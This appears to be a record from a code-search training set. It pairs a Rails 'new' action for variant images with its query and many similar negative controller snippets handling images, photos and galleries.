"def images(product_id, variation_id, params = {})\n path = \"/products/#{product_id}/variations/#{variation_id}/images\"\n\n response, status = BeyondApi::Request.get(@session,\n path,\n params)\n\n handle_response(response, status)\n end",
"def index\n @pictures = @album.pictures #JRD111115\n\n respond_to do |format|\n format.html #index.html.erb\n format.json { render json: @pictures}\n end\n end",
"def show\n @slide_image = SlideImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @slide_image }\n end\n end",
"def show\n render json: @picture, status: :ok\n end",
"def images\n Image.where(product_id: id)\nend",
"def show\n @photo = Photo.find(params[:id])\n\n render json: @photo\n end",
"def show\n respond_to do |format|\n format.html\n format.json { render json: @article, methods: [:image_url] }\n end\n end",
"def show\n # proxy to GET /roi/id\n @result = ImageServer.get('/roi/'+params[:id]);\n render :json => @result\n end",
"def index\n @family_images = FamilyImage.all\n\n render json: @family_images\n end",
"def show\n @banner_img = BannerImg.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @banner_img }\n end\n end",
"def show\n @image_section = ImageSection.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_section }\n end\n end",
"def marketplace_image_my_images_with_http_info(opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug 'Calling API: VnfsApi.marketplace_image_my_images ...'\n end\n # resource path\n local_var_path = '/1.0.0/marketplace/image/my_images/'\n\n # query parameters\n query_params = {}\n\n # header parameters\n header_params = {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json'])\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n auth_names = ['oAuth2']\n data, status_code, headers = @api_client.call_api(:GET, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'InlineResponse2009')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: VnfsApi#marketplace_image_my_images\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def create\n params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts\n @variant_image = VariantImage.new(params[:variant_image])\n\t\t@variant = @variant_image.variant\n @product = @variant.product \n\n respond_to do |format|\n if @variant_image.save\n format.html { redirect_to @variant, notice: 'Image added successfully.' }\n format.js { redirect_to @variant_image, notice: 'Image added successfully.' }\n format.json { render json: @variant_image, status: :created, location: @variant_image }\n else\n format.html { render action: \"new\" }\n format.js { render action: \"new\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def show\n @image_datum = ImageDatum.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image_datum }\n end\n end",
"def show\n render json: @thumb\n end",
"def get_images_data\t\t\t\t\t\t\n\t\t{ payload: { 'makes' => makes_dropdown, 'images' => images_array('none').compact}, success: true}\n\tend",
"def show\n @image = Image.find(params[:id])\n checkaccountobject(\"images\",@image)\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end",
"def image\n\t\t@image ||= Image.joins(:album)\n .where(id: params[:id], :albums => {:user_id => user_id})\n .take || halt(404)\n\tend",
"def images(params = {})\n @api.get(\"#{@api.path}/List/#{@id}/Images\", params: params)\n end",
"def images\n @assets = filtered_assets.where(type: \"Image\").order(\"created_at DESC\").paginate(params)\n @assets = @assets.search(params[:q], fuzzy: true) if params[:q].present?\n respond_to do |format|\n format.html do\n render template: \"/dash/chooser/images\"\n end\n format.js do\n render template: \"/dash/chooser/images_search\"\n end\n end\n end",
"def get_images\n @command = :get_images\n # set a flag indicating whether or not the user wants to see all images,\n # including the hidden ones\n show_hidden = (@prev_args.peek(0) == \"-i\" || @prev_args.peek(0) == \"--hidden\")\n # get the images from the RESTful API (as an array of objects)\n uri_str = ( show_hidden ? \"#{@uri_string}?hidden=true\" : @uri_string )\n uri = URI.parse uri_str\n result = hnl_http_get(uri)\n unless result.blank?\n # convert it to a sorted array of objects (from an array of hashes)\n sort_fieldname = 'filename'\n result = hash_array_to_obj_array(expand_response_with_uris(result), sort_fieldname)\n end\n # and print the result\n print_object_array(result, \"Images:\", :style => :table)\n end",
"def show\n @home_categories_products_indices_photo = Home::Categories::Products::Indices::Photo.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @home_categories_products_indices_photo }\n end\n end",
"def show\n @hotel_pic = HotelPic.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @hotel_pic }\n end\n end",
"def index\n @slider_images = SliderImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @slider_images }\n end\n end",
"def index\n @slider_image_types = SliderImageType.all\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @slider_images }\n end\n end",
"def images\n images = []\n JSON.parse(resource['/offerings/image'].get)[\"images\"].each do |img|\n images << Image.new(img)\n end\n return images\n end",
"def show\n @web_image = WebImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @web_image }\n end\n end",
"def show\n @combined_image = CombinedImage.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @combined_image }\n end\n end",
"def getImage\n image=AWS::S3::S3Object.url_for('testing.png','tradeDev')\n render :json => {:image=>image}\n end",
"def show\n @picture = @album.pictures.find(params[:id]) #JRD111115\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @picture}\n end\n end",
"def images\n bugImages = BugImage.all\n render :json => bugImages.to_json\n end",
"def index\n # @images = Image.all\n # @images = Image.order(\"id\").page(params[:page])\n @images = Image.page(params[:page])\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @images }\n end\n end",
"def show\n @pictures = TourService.find(params[:id]).tour_images\n # render :show\n end",
"def show\n # maybe I need to uncomment this:\n # @image = Image.find(params[:id]) \n # add_breadcrumb @image, image_path(@image) \n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @image }\n end\n end"
] | [
"0.7800791",
"0.7155099",
"0.70267254",
"0.69889295",
"0.6987502",
"0.6987502",
"0.67943203",
"0.6752776",
"0.66671115",
"0.66671115",
"0.66671115",
"0.66671115",
"0.6665982",
"0.6631958",
"0.6629154",
"0.6613807",
"0.6606048",
"0.66020113",
"0.66002864",
"0.65955347",
"0.6582523",
"0.65727264",
"0.65668374",
"0.655884",
"0.6538189",
"0.6538189",
"0.6538016",
"0.65311813",
"0.650726",
"0.6500925",
"0.6489309",
"0.648821",
"0.6482609",
"0.6465915",
"0.64471453",
"0.64460534",
"0.6435624",
"0.6419042",
"0.64036113",
"0.6393731",
"0.63922125",
"0.63869417",
"0.6380044",
"0.63683736",
"0.6368284",
"0.6367777",
"0.63619465",
"0.6358434",
"0.6357052",
"0.63428694",
"0.63405526",
"0.63397497",
"0.63358516",
"0.63355124",
"0.6331572",
"0.6331572",
"0.63307226",
"0.6321791",
"0.6320614",
"0.6315715",
"0.6315229",
"0.6314807",
"0.6310178",
"0.63075984",
"0.6300438",
"0.6297653",
"0.6294552",
"0.62906426",
"0.62868655",
"0.6278393",
"0.62739754",
"0.62686497",
"0.6268517",
"0.6265852",
"0.62532437",
"0.6252447",
"0.6251686",
"0.62488353",
"0.6246514",
"0.6245801",
"0.6244335",
"0.62413156",
"0.62400186",
"0.6237236",
"0.6234503",
"0.6223787",
"0.6222654",
"0.62154055",
"0.6211591",
"0.62069374",
"0.62063605",
"0.62016416",
"0.619991",
"0.61969775",
"0.61875314",
"0.61840886",
"0.6171186",
"0.6166071",
"0.6161978",
"0.6161041"
] | 0.7340816 | 1 |
GET /variant_images/new GET /variant_images/new.json | def new
@variant_image = VariantImage.new
@variant = Variant.find(params[:variant_id])
@variant_image.variant_id = @variant.id
@product = @variant.product
respond_to do |format|
format.html # new.html.erb
format.js # new.js.erb
format.json { render json: @variant_image }
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @image_url = ImageUrl.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_url }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @image }\n end\n end",
"def new\n @image = Image.new\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @image }\n end\n end",
"def new\n @variant = Variant.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @variant }\n end\n end",
"def create\n params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts\n @variant_image = VariantImage.new(params[:variant_image])\n\t\t@variant = @variant_image.variant\n @product = @variant.product \n\n respond_to do |format|\n if @variant_image.save\n format.html { redirect_to @variant, notice: 'Image added successfully.' }\n format.js { redirect_to @variant_image, notice: 'Image added successfully.' }\n format.json { render json: @variant_image, status: :created, location: @variant_image }\n else\n format.html { render action: \"new\" }\n format.js { render action: \"new\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @property_image = PropertyImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @property_image }\n end\n end",
"def new\n @image_upload = ImageUpload.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_upload }\n end\n end",
"def new\n @motivational_image = MotivationalImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @motivational_image }\n end\n end",
"def new\n @image_gallery = ImageGallery.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_gallery }\n end\n end",
"def new\n @image_section = ImageSection.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_section }\n end\n end",
"def new\n \n @page = Page.new\n @page.images.build\n \n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @page }\n end\n end",
"def new\n @imovel = Imovel.new\n @imovel.images.build\n \n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @imovel }\n end\n end",
"def new\n @slider_image = SliderImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def new\n @slider_image = SliderImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @slider_image }\n end\n end",
"def new\n @estate_agent_image = EstateAgentsImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @estate_agent_image }\n end\n end",
"def new\n @photo = Photo.new\n\n render json: @photo\n end",
"def new\n @review_image = ReviewImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @review_image }\n end\n end",
"def new\n @category_image = CategoryImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @category_image }\n end\n end",
"def new\n @bgimage = Bgimage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @bgimage }\n end\n end",
"def new\r\n @car_image = CarImage.new\r\n\r\n respond_to do |format|\r\n format.html # new.html.erb\r\n format.json { render json: @car_image }\r\n end\r\n end",
"def new\n @image_datum = ImageDatum.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_datum }\n end\n end",
"def new\n @slide_image = SlideImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @slide_image }\n end\n end",
"def new\n @pic = Pic.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @pic }\n end\n end",
"def new\n @flavours = @provider.get_flavors\n puts \"getting the flavors #{@flavours.inspect}\"\n @images = @provider.get_images\n puts \"getting the flavors #{@images.inspect}\"\n @instance = @provider.instances.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @instance }\n end\n end",
"def new\n @collage = Collage.new\n @images = Image.order('created_at DESC')\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @collage }\n end\n end",
"def new\n @image = @owner.images.build\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @photo = @allbum.photos.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @bwimage = Bwimage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @bwimage }\n end\n end",
"def new\n @memberimage = Memberimage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @memberimage }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @pictures_of_cat = PicturesOfCat.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @pictures_of_cat }\n end\n end",
"def new\n @picture = Picture.new\n \n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @picture = Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @picture = Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @picture = Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @photo }\n end\n end",
"def new\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @photo }\n end\n end",
"def new\n @foto = Foto.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @foto }\n end\n end",
"def new\n @match_image = MatchImage.new\n if params[:match_id]\n @match = Match.find(params[:match_id])\n end\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @match_image }\n end\n end",
"def new\n @shop_photo = ShopPhoto.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @shop_photo }\n end\n end",
"def new\n @s3_image = S3Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @s3_image }\n end\n end",
"def new\n @product = Product.new\n @product.photos.build\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @product }\n end\n end",
"def new\n @image_member = ImageMember.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image_member }\n end\n end",
"def new\n @photo_library = PhotoLibrary.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo_library }\n end\n end",
"def new\n @garment_image = GarmentImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @garment_image }\n end\n end",
"def new\n @combined_image = CombinedImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @combined_image }\n end\n end",
"def new\n @banner_img = BannerImg.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @banner_img }\n end\n end",
"def new\n @photo = Photo.new \n \n #@photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def new\n @web_image = WebImage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @web_image }\n end\n end",
"def new\n @hotel_pic = HotelPic.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @hotel_pic }\n end\n end",
"def new\n @property_picture = PropertyPicture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @property_picture }\n end\n end",
"def new\n @image = Image.new\n @image.user=@current_user\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @image }\n end\n end",
"def new\n @picture = Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json=>@picture}\n end\n end",
"def new\n repo = assets_repo\n @v_asset = repo.new\n\n respond_to do |format|\n format.html new.html.erb\n format.json { render json: @v_asset }\n end\n end",
"def new\n @picture = @museum.pictures.new #Picture.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @picture }\n end\n end",
"def new\n @gallery = Gallery.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @gallery }\n end\n end",
"def new\n @gallery = Gallery.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @gallery }\n end\n end",
"def new\n @admin_photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @admin_photo }\n end\n end",
"def new\n @gallery = Gallery.new(:public => true)\n \n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @gallery }\n end\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n format.json { render :json => { url: @image.image.url} }\n else\n \n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @sub_variant = SubVariant.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @sub_variant }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.js\n format.xml { render :xml => @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.js\n format.xml { render :xml => @image }\n end\n end",
"def new\n @gallery_image = @project.gallery_images.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @gallery_image }\n end\n end",
"def new\n @destination = Destination.new\n @destination.build_dest_image\n\n respond_to do |format|\n format.html # _new.html.erb\n format.json { render json: @destination }\n end\n end",
"def new\n @plate_photo = PlatePhoto.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @plate_photo }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @product = Product.new\n 5.times { @product.photos.build }\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @product }\n end \n end",
"def new\n @image = Image.new\n \n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @album = Album.find(params[:album_id])\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo }\n end\n end",
"def create\n @photos = Photo.new(photos_params)\n if @photos.save\n render json: { id: @photos.id, url: @photos.gallery.url,\n size: @photos.gallery_file_size }\n else\n render json: { id: nil }\n end\n end",
"def new\n @fileversion = Fileversion.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @fileversion }\n end\n end",
"def new\n @image = Image.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @console_image }\n end\n end",
"def new\n @img = Img.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @img }\n end\n end",
"def new\n @image = @user.images.build\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @image }\n end\n end",
"def new\n @flavor = Flavor.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @flavor }\n end\n end",
"def new\n @photo1 = Photo1.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @photo1 }\n end\n end",
"def new\n @album = Album.find(params[:album_id])\n @photo = Photo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @photo }\n end\n end",
"def new\n @file_version = FileVersion.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @file_version }\n end\n end",
"def new\n @store = Store.new\n @store.pictures.build\n @store.pictures.build\n @store.pictures.build\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @store }\n end\n end",
"def new\n @pinimage = Pinimage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @pinimage }\n end\n end"
] | [
"0.7331562",
"0.7331562",
"0.7331562",
"0.7331562",
"0.7331562",
"0.7331562",
"0.7296701",
"0.72743815",
"0.7256295",
"0.71241343",
"0.71211594",
"0.7083276",
"0.70256233",
"0.70135015",
"0.69998044",
"0.6992117",
"0.6989176",
"0.6984019",
"0.697423",
"0.697423",
"0.6973233",
"0.6955786",
"0.6934131",
"0.6932445",
"0.6931763",
"0.6911567",
"0.6906291",
"0.6898929",
"0.68872726",
"0.68816876",
"0.68796176",
"0.68586147",
"0.682495",
"0.68231565",
"0.6799654",
"0.6781087",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.67803675",
"0.6778843",
"0.67365617",
"0.6727361",
"0.6727361",
"0.6727361",
"0.67162734",
"0.67162734",
"0.6713595",
"0.6708873",
"0.67028326",
"0.6699088",
"0.6693906",
"0.66865325",
"0.6654652",
"0.6646455",
"0.664642",
"0.66436696",
"0.66392833",
"0.6635906",
"0.6634227",
"0.6629399",
"0.662353",
"0.66112673",
"0.66096437",
"0.6595721",
"0.6595696",
"0.6595696",
"0.65932596",
"0.6580145",
"0.65766793",
"0.6571744",
"0.65709686",
"0.65709686",
"0.65680903",
"0.65614283",
"0.65569305",
"0.65501225",
"0.6541844",
"0.65396154",
"0.65369034",
"0.65364665",
"0.65349126",
"0.65348065",
"0.6534482",
"0.6518548",
"0.65145105",
"0.65141106",
"0.65132004",
"0.65063447",
"0.65055776",
"0.6492114",
"0.64817876"
] | 0.7732069 | 0 |
POST /variant_images POST /variant_images.json | def create
params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts
@variant_image = VariantImage.new(params[:variant_image])
@variant = @variant_image.variant
@product = @variant.product
respond_to do |format|
if @variant_image.save
format.html { redirect_to @variant, notice: 'Image added successfully.' }
format.js { redirect_to @variant_image, notice: 'Image added successfully.' }
format.json { render json: @variant_image, status: :created, location: @variant_image }
else
format.html { render action: "new" }
format.js { render action: "new" }
format.json { render json: @variant_image.errors, status: :unprocessable_entity }
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def new\n @variant_image = VariantImage.new\n @variant = Variant.find(params[:variant_id])\n @variant_image.variant_id = @variant.id\n @product = @variant.product\n\n respond_to do |format|\n format.html # new.html.erb\n format.js # new.js.erb\n format.json { render json: @variant_image }\n end\n end",
"def index\n @variant_images = VariantImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variant_images }\n end\n end",
"def create\n @apartment = current_user.apartments.new(apartment_params)\n\n respond_to do |format|\n if @apartment.save\n if params[:images]\n # The magic is here ;)\n params[:images].each { |image|\n @apartment.pictures.create(image: image)\n }\n end\n format.html { redirect_to @apartment, notice: 'Propiedad creada correctamente.' }\n format.json { render :show, status: :created, location: @apartment }\n else\n format.html { render :new }\n format.json { render json: @apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n\n # fetch tags from google vision API\n helpers.fetch_tags(image_params)\n\n @image.image_file.attach(image_params[:image_file])\n\n respond_to do |format|\n if @image.save()\n format.html { redirect_to @image, notice: \"Image was successfully created.\" }\n format.json { render :show, status: :created, location: @image }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def upload_image\n @image = Image.create(image_path: params[:upload][:image])\n p @image\n render json: @image\n end",
"def create\n @image = Spree::Image.new(params[:image])\n\n respond_to do |format|\n if @upload.save\n format.html {\n render :json => [@image.to_jq_upload].to_json,\n :content_type => 'text/html',\n :layout => false\n }\n format.json { render json: {files: [@image.to_jq_upload]}, status: :created, location: @image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def variant\n shop = params[:shop]\n product_id = params[:id]\n variant_id = params[:variant_id]\n image_url = params[:url]\n\n begin\n url = \"http://variantimages.shopifyapps.com/jquery-preload.js?shop=#{shop}&id=#{product_id}\"\n content = open(url).read\n\n if match = content.match(/variantData = ([^;]+);/)\n variant_url = URI(image_url)\n variant_url.path = variant_path([\n File.dirname(variant_url.path),\n JSON.parse(match[1])[variant_id][\"filename\"].split('.').first,\n File.basename(variant_url.path).split('_').last,\n ])\n image_url = variant_url.to_s\n end\n rescue => e\n end\n\n redirect_to image_url\n end",
"def create\n @rent = Rent.new(rent_params)\n @rentpar = rent_params\n respond_to do |format|\n if @rent.save\n\n if params[:image]\n puts params[:image]\n params[:image].each { |image|\n @rent.rent_images.create(rent_id: @rent.id, image:image)\n }\n \n end\n\n format.html { redirect_to @rent, notice: 'Rent was successfully created.' }\n format.json { render :show, status: :created, location: @rent }\n else\n format.html { render :new }\n format.json { render json: @rent.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @image = Image.new(image_params)\n respond_to do |format|\n if @image.save\n format.json { render :json => { url: @image.image.url} }\n else\n \n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @results = []\n\n unless params[:files].nil?\n params[:files].each do |data|\n img = Image.new\n img.filename = data.original_filename\n img.data = data.read\n img.upload_id = params[:uuid]\n img.visitation_form_id = params[:formId]\n img.image_type = params[:imageType]\n img.content_type = data.content_type\n #img.temp_index = params[:birdIndex]\n img.bird_id = params[:birdId]\n\n if !img.save\n render :json => { :errors => img.errors.full_messages }, :status => 400 and return\n else\n @results << { name: img.filename, imageType: img.image_type, id: img.id }\n end\n end\n end\n\n render json: { files: @results }\n end",
"def create \n @image ||= Image.new(image_params)\n if @image.save\n render json: {\"url\" => @image.image_url(:resized), \"success\" => true}\n else\n render json: @image.errors, status: :unprocessable_entity\n end\n end",
"def create\n @smartphone = Smartphone.new(smartphone_params)\n\n respond_to do |format|\n if @smartphone.save\n if params[:images]\n params[:images].each do |val|\n @smartphone.pictures.create(image: val)\n end\n end\n\n format.html { redirect_to @smartphone, notice: 'Smartphone was successfully created.' }\n format.json { render :show, status: :created, location: @smartphone }\n else\n format.html { render :new }\n format.json { render json: @smartphone.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n image = Image.create(image_params)\n\n if image.new_record?\n render json: { errors: image.errors.messages }, status: 422\n else\n render json: image, status: 201\n end\n end",
"def create\n @spot = Spot.new(spot_params)\n\n respond_to do |format|\n if @spot.save\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n format.html { redirect_to [@country,@spot], notice: \"Spot was successfully created.\" }\n else\n format.html { render :new }\n end\n end\n end",
"def create\n @spot = Spot.new(spot_params)\n\n respond_to do |format|\n if @spot.save\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n format.html { redirect_to [@country,@spot], notice: \"Spot was successfully created.\" }\n else\n format.html { render :new }\n end\n end\n end",
"def get_images_data\t\t\t\t\t\t\n\t\t{ payload: { 'makes' => makes_dropdown, 'images' => images_array('none').compact}, success: true}\n\tend",
"def add_image\n obtain_product_image_params\n pi = ProductImage.new(picture: @image_params)\n @product.product_images << pi\n render json: @product.simple_info, status: :ok\n rescue => e\n render json: { error: e }, status: :bad_request\n end",
"def create\n create_params = product_image_params || {product_uuid: @product.uuid}\n @product_image = ProductImage.new(product_image_params)\n if @product_image.save\n render json: @product_image, status: 201\n else\n render_error 400, @product_image.errors.full_messages\n end\n end",
"def create\n @image = Image.new(image_params)\n\n respond_to do |format|\n if @image.save\n format.json { render json: @image, status: :created, location: [:admin, @image] }\n else\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @estate_agent_image = EstateAgentsImage.new(params[:property_image])\n\n respond_to do |format|\n if @estate_agent_image.save\n format.html { redirect_to @estate_agent_image, notice: 'Property image was successfully created.' }\n format.json { render json: @estate_agent_image, status: :created, location: @estate_agent_image }\n else\n format.html { render action: \"new\" }\n format.json { render json: @estate_agent_image.errors, status: :unprocessable_entity }\n end\n end\n end",
